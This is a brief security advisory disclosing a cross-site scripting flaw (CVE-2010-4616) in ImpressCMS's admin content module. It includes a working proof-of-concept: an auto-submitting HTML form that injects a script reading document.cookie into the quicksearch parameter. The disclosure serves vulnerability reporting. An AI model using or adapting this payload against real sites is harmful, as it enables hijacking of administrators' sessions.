High-Tech Bridge SA Security Research Lab has discovered vulnerability in ImpressCMS which could be exploited to perform cross-site scripting attacks.
- Cross-site scripting (XSS) vulnerability in ImpressCMS: CVE-2010-4616
The vulnerability exists due to input sanitation error in the “quicksearch_ContentContent” parameter in modules/content/admin/content.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim has access to administrative interface.
Exploitation example:
<form action=“http://host/modules/content/admin/content.php” method=“post” name=“main”>
<input type=“hidden” name=“quicksearch_ContentContent” value=‘search"><script>alert(document.cookie)</script>’>
<input type=“hidden” name=“button_quicksearch_ContentContent” value=“Search”>
<input type=“hidden” name=“filtersel” value=“default”>
<input type=“hidden” name=“limitsel” value=“15”>
</form>
<script>
document.main.submit();
</script>